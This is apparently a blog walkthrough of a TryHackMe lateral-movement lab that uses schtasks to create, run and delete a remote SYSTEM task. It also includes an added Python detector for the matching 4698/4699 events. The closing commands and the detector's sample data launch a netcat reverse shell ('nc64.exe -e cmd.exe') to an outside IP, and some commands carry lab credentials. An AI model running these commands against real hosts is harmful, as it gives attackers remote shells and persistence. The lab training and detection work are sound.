Spawn remote process with scheduled tasks



A common Windows feature abused by threat actors to move laterally and maintain persistence is scheduled tasks. Threat actors love this technique because the Task Scheduler is available on every Windows installation.

Note: [image] Thanks mura

This blog post will demonstrate this method using Task 4 of the Lateral Movement and Pivoting room provided by TryHackMe.

How to create a scheduled task on a remote host

schtasks /s TARGET /RU "SYSTEM" /create /tn "THMtask1" /tr "<payload>" /sc ONCE /sd 01/01/1970 /st 00:00

Command breakdown:

/s = the remote host to issue the command to

/RU = run the task as the specified user (defaults to the current user account)

/create = create the task

/tn = task name (e.g. "mytask"; "THMtask1" in the example above)

/tr = task run (the command to execute)

/sc = schedule frequency (MINUTE, HOURLY, DAILY, ONCE, etc.)

/sd = start date, the date on which to execute the task

/st = start time, the time of execution

/u = domain username used to connect to the remote host

/p = password; if left blank you will be prompted for it

Because we can run the scheduled task manually (see below), the /sd and /st values are not important in this scenario; they only need to be valid.

Manual task execution

schtasks /s TARGET /run /TN "THMtask1"

Like a good threat actor, we want to make sure to clean up after ourselves by deleting the task:

schtasks /S TARGET /TN "THMtask1" /DELETE /F
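From the defender's side, the create / run / delete sequence above leaves a recognisable trail in the Security log: event 4698 (task created, including the full task XML), and 4699 (task deleted). The following is an added example, not part of the original post, of a small detector that parses the TaskContent XML of 4698 events and flags tasks that run as SYSTEM but were registered by an ordinary user account, carry a placeholder start date such as 01/01/1970, and are deleted within minutes of creation. The event records, task names, SIDs, hosts and timestamps are constructed sample data; the field names mimic what a SIEM export of these events typically contains.

```python
"""Detect the create-as-SYSTEM / run / delete scheduled-task pattern.

Added example (not from the original post). Input records are constructed
to look like Windows Security events 4698 (task created) and 4699 (task
deleted) after export to JSON-like dictionaries.
"""
from datetime import datetime, timedelta
import xml.etree.ElementTree as ET

# Namespace used by the Task Scheduler XML embedded in event 4698.
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed sample events: one attacker-style task registered by a user
# account and removed shortly afterwards, and one benign built-in task.
SAMPLE_EVENTS = [
    {"EventID": 4698, "TimeCreated": "2024-05-01T10:00:03",
     "SubjectUserName": "t1_user", "TaskName": "\\THMtask1",
     "TaskContent": """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><StartBoundary>1970-01-01T00:00:00</StartBoundary></TimeTrigger></Triggers>
  <Principals><Principal><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions><Exec><Command>c:\\tools\\nc64.exe</Command><Arguments>-e cmd.exe 10.0.0.5 4443</Arguments></Exec></Actions>
</Task>"""},
    {"EventID": 4699, "TimeCreated": "2024-05-01T10:01:40",
     "SubjectUserName": "t1_user", "TaskName": "\\THMtask1"},
    {"EventID": 4698, "TimeCreated": "2024-05-01T11:00:00",
     "SubjectUserName": "SYSTEM",
     "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "TaskContent": """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2024-05-08T01:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Principals><Principal><UserId>S-1-5-18</UserId></Principal></Principals>
  <Actions><Exec><Command>%windir%\\system32\\defrag.exe</Command><Arguments>-c -h</Arguments></Exec></Actions>
</Task>"""},
]


def parse_task(task_xml):
    """Pull the run-as principal, first start boundary and action out of the task XML."""
    root = ET.fromstring(task_xml)
    user = root.findtext("t:Principals/t:Principal/t:UserId", default="", namespaces=TASK_NS)
    start = root.findtext(".//t:StartBoundary", default="", namespaces=TASK_NS)
    cmd = root.findtext("t:Actions/t:Exec/t:Command", default="", namespaces=TASK_NS)
    args = root.findtext("t:Actions/t:Exec/t:Arguments", default="", namespaces=TASK_NS)
    return {"user": user, "start": start, "command": (cmd + " " + args).strip()}


def score_task(event, deleted_at=None, delete_window=timedelta(minutes=15)):
    """Return the suspicious traits of one 4698 event (empty list = nothing odd)."""
    task = parse_task(event["TaskContent"])
    reasons = []
    # A task that runs as SYSTEM (S-1-5-18) but was registered by a user account.
    if task["user"] in ("S-1-5-18", "SYSTEM") and event["SubjectUserName"].upper() != "SYSTEM":
        reasons.append("runs as SYSTEM but registered by user " + event["SubjectUserName"])
    # A throwaway start date (e.g. 1970) means the task was meant to be run by hand.
    year = task["start"][:4]
    if year.isdigit() and int(year) < 2000:
        reasons.append("placeholder start date " + task["start"][:10])
    # Create-then-delete within a short window is the clean-up step.
    created = datetime.fromisoformat(event["TimeCreated"])
    if deleted_at is not None and timedelta(0) <= deleted_at - created <= delete_window:
        secs = int((deleted_at - created).total_seconds())
        reasons.append("deleted %d seconds after creation" % secs)
    return {"task": event["TaskName"], "command": task["command"], "reasons": reasons}


def find_suspicious_tasks(events, min_reasons=2):
    """Correlate 4698 with later 4699 for the same task name and report tasks with enough traits."""
    deletions = {}
    for e in events:
        if e["EventID"] == 4699:
            deletions.setdefault(e["TaskName"], []).append(datetime.fromisoformat(e["TimeCreated"]))
    findings = []
    for e in events:
        if e["EventID"] != 4698:
            continue
        created = datetime.fromisoformat(e["TimeCreated"])
        later = [d for d in deletions.get(e["TaskName"], []) if d >= created]
        finding = score_task(e, min(later) if later else None)
        if len(finding["reasons"]) >= min_reasons:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in find_suspicious_tasks(SAMPLE_EVENTS):
        print(f["task"], "->", f["command"])
        for r in f["reasons"]:
            print("   -", r)
```

The 4698 TaskContent field carries the whole task definition, so the run-as principal, trigger and command line are all available without querying the host. Requiring at least two traits keeps noisy built-in SYSTEM tasks out of the results while still catching a task that is registered, run and deleted inside a couple of minutes, which is exactly the sequence of commands shown above.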

Demo TIME

Let's start by creating our payload using msfvenom

[screenshot omitted]

After creating our payload we need some way to get it onto the host. In this scenario I have a set of credentials that let me access an SMB share, to which I upload my reverse shell.

[screenshot omitted]

Now that the reverse shell has been uploaded successfully, I need to create my task. As we are creating a task that runs as a privileged user, I will need to specify credentials (please ignore the formatting; the TryHackMe attack box sucks).

[screenshot omitted]

schtasks /s 10.200.51.201 /RU "SYSTEM" /create /tn "THMtask69" /tr "<c:\tools\nc64.exe -e cmd.exe 10.50.49.81 4443>" /sc ONCE /sd 01/01/1925 /st 00:00 /u ZA.TRYHACKME.COM\t1_leonard.summers -p EZpass4ever
schtasks /s 10.200.51.201 /run /TN "THMtask69" /u ZA.TRYHACKME.COM\t1_leonard.summers -p EZpass4ever